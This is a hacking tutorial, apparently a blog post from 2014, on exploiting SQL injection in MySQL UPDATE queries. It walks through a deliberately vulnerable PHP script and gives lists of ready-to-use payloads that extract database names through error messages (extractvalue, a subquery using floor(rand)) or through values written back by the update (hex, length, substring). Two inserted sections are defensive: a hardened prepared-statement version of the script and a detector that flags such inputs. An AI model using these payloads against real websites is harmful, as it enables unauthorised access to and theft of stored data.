Well, the name itself says everything, so I guess you don't need to be told what we are up to. But still, for a small explanation: this time we will be injecting into an Update query.


Okay, first thing you should remember: don't try those other testing techniques with a delete query, else you will end up changing the whole table of the website. Now the question arises: how will you know if the query you are going to inject into is an update query?

Well, the answer is pretty simple: "common sense". It really depends on the action you are performing using the form or any other way. What you really need to know is that whatever action you are performing, if it is updating something, then it should be the Update Query injection type.

You can achieve this using the following injections:
1. Xpath Injection
2. Sub Query Injection
3. Tampering with the Update Query input values to get the output.
4. Blind Injection

I strongly suggest you read XPATH Injection and Sub-Query Injection, as over here I won't be discussing the first two injections in detail. Here we will discuss only a small change in the injection; everything else stays the same.

Let us take a vulnerable update script and start exploring it.

Example:
<?php
// Deliberately vulnerable update script: the POST value is pasted straight into the SQL string.
$status = $_POST['status'];
$current_user = $_SESSION['username'];
$query = "update users set status='$status' where username='$current_user'";
if (!mysql_query($query, $conn))
    // Echoing mysql_error() to the client is what the error-based methods below rely on.
    echo "Error While Updation process : " . mysql_error();
else
    echo "Updated Successfully";
?>
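For contrast, here is a hardened counterpart of the same update script. This is an added example, not the original author's code; it assumes $conn is an open mysqli connection, that $_SESSION['username'] was set at login, and the 140-character limit is an assumed application rule.

```php
<?php
// Added example: hardened counterpart of the vulnerable update script above.
// Assumes $conn is an open mysqli connection and $_SESSION['username'] is set at login.
$current_user = $_SESSION['username'] ?? null;
if ($current_user === null) {
    http_response_code(401);
    exit('not logged in');
}

$status = $_POST['status'] ?? '';
// Assumed application rule: a status is short, valid UTF-8 text.
if (strlen($status) > 140 || !mb_check_encoding($status, 'UTF-8')) {
    http_response_code(400);
    exit('invalid status');
}

// Prepared statement: the status value reaches MySQL as data, never as SQL text,
// so quotes, hex()/length() calls or comment sequences in it are simply stored as-is.
$stmt = $conn->prepare("UPDATE users SET status = ? WHERE username = ?");
if ($stmt === false) {
    error_log("prepare failed: " . $conn->error);   // details go to the server log only
    http_response_code(500);
    exit('update failed');
}
$stmt->bind_param("ss", $status, $current_user);

if (!$stmt->execute()) {
    // Never echo the database error to the client: the XPATH and sub-query
    // methods depend on exactly that leak. Log it and return a generic message.
    error_log("status update failed for {$current_user}: " . $stmt->error);
    http_response_code(500);
    exit('update failed');
}
$stmt->close();
echo "Updated successfully";
```

The generic error message closes off the two error-based methods described in this post, and the prepared statement closes off the input-tampering one, because the value is never parsed as part of the query.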

Exploitation using XPATH injection.

This will work only when the developer has put the error function in there; otherwise only the 3rd injection will work.

Query:
update users set status='$status' where username='$current_user';
Injection in the Status variable:
' extractvalue(0x0a,concat(0x0a,(select database()))) '
" extractvalue(0x0a,concat(0x0a,(select database()))) "
' extractvalue(0x0a,concat(0x0a,(select database())))--+
" extractvalue(0x0a,concat(0x0a,(select database())))--+
' extractvalue(0x0a,concat(0x0a,(select database())))#
" extractvalue(0x0a,concat(0x0a,(select database())))#
' extractvalue(0x0a,concat(0x0a,(select database())))--
" extractvalue(0x0a,concat(0x0a,(select database())))--

Now let's see what query will be passed. For the above given query, the first injection will work.
$status = ' extractvalue(0x0a,concat(0x0a,(select database()))) '
update users set status='' extractvalue(0x0a,concat(0x0a,(select database()))) '' where username='$current_user';

So actually the above query will output the data in the form of an error. For the rest of the exploitation using XPATH, read XPATH Injection.

Exploitation using Sub-Query Injection.

update users set status='$status' where username='$current_user'

Injection in the Status variable:
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) '
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) "
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--+
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--+
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)#
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)#
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--

Now let's see what query will be passed. For the above given query, the first injection will work.

update users set status='' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) '' where username='$current_user';

So actually the above query will output the data in the form of an error; for the rest of the exploitation, read Sub Query Injection. But it will only work when the developer is printing an error. So now let's start with our 3rd method.

Tampering with the Update Query input

Well, this time we are not going to create any error, assuming that the developer is not showing any error. So we will get the output by inserting the injection and letting it update. After that we will check the updated value to get the data.

Actually, because of the lack of my own knowledge, or the lack of a concatenation operator in MySQL, this task is not going to be very easy. There are loads of other ways to inject into an Update query, but I prefer not to discuss them here. We will now get the output as a numeric value; for that we will use ' ' to add, and we will convert our values into hex to get the output in numeric form. We can also use the ASCII function for the same approach, but ASCII makes the process slower and lengthier. At the same time there are many other methods to do it, but right now I find this one the best I have got, so let us continue with this.

Query:
update users set status='$status' where username='$current_user'

Our input is going into the $status variable. Now we will first try to get the count of characters in the current database() string.

Injection:
' length(database()) '

So now let's see what will happen on the query side.

update users set status='' length(database()) '' where username='$current_user'

Let us assume the database name is "target"; so now if we check the updated value, it will show us 6 there.

Now let us get the current database name. What we will do is convert the name to hex to get the data as a numeric value.

Getting output using Hex.

injection:
' hex(database()) '
Query Part:
update users set status='' hex(database()) '' where username='$current_user'

The value '746172676574' will be updated, so if we unhex this value we will get that the current database name is 'target'. That was easy, but the problem with hex is that some characters like 'L' are 6C, which will then be truncated; so we can use the hex function twice if the name is not complete, and if we still don't get it completely, we can use the substring function to get 3 characters at a time.

Getting database() by hex encoding it twice.

injection:
' hex(hex(substring(database(),1,3))) '
' hex(hex(substring(database(),3,3))) '
Query Part:
update users set status='' hex(hex(substring(database(),1,3))) '' where username='$current_user'
update users set status='' hex(hex(substring(database(),3,3))) '' where username='$current_user'

Okay, now we can continue dumping the other parts in the same manner using the basic tricks, and the injection will remain the same. If you don't understand the rest of the exploitation, read Basic SQL Injection and Death Row Injection again, and most importantly use your mind.
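From the defending side, the tampering method leaves a trace: the stored status value itself carries quotes, MySQL function calls and comment sequences. The following review script is an added example (not the author's code) that scores submitted status values against only the indicators this post uses; the $samples array is constructed test data, not real traffic, and the two-indicator threshold is an assumed tuning choice so that a lone apostrophe in ordinary text is not flagged.

```php
<?php
// Added example: flag status values that carry the indicators seen in this tutorial.
// The indicator list is deliberately limited to what this page discusses.
function suspiciousStatusIndicators(string $value): array
{
    $indicators = [
        'quote character'      => fn($v) => str_contains($v, "'") || str_contains($v, '"'),
        'sql comment sequence' => fn($v) => (bool) preg_match('/--|#/', $v),
        'mysql function call'  => fn($v) => (bool) preg_match(
            '/\b(extractvalue|hex|length|substring|concat|database|floor|rand)\s*\(/i', $v),
        'nested select'        => fn($v) => (bool) preg_match('/\bselect\b/i', $v),
    ];
    $hits = [];
    foreach ($indicators as $name => $test) {
        if ($test($value)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Assumed threshold: a single indicator (e.g. one apostrophe) is normal text;
// two or more together match the shape of the payloads shown in this post.
function isSuspiciousStatus(string $value): bool
{
    return count(suspiciousStatusIndicators($value)) >= 2;
}

// Constructed sample inputs, not real traffic.
$samples = [
    "Out of office until Monday",
    "Don't panic",                                   // one apostrophe: ordinary text, 1 indicator
    "' length(database()) '",                        // length probe from this page, 2 indicators
    "' hex(hex(substring(database(),1,3))) '",       // double-hex probe from this page, 2 indicators
    "' extractvalue(0x0a,concat(0x0a,(select database())))--+", // error-based probe, 4 indicators
];
foreach ($samples as $s) {
    $hits = suspiciousStatusIndicators($s);
    printf("%-60s %s\n", $s, isSuspiciousStatus($s) ? 'FLAG: ' . implode(', ', $hits) : 'ok');
}
```

Run it over the status column or over the application's request log to see which submissions match; a match is a trigger for reviewing that account's updates, not proof of compromise on its own.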

Happy Hacking.

Author : Zenodermus Javanicus
Date : 2014-04-06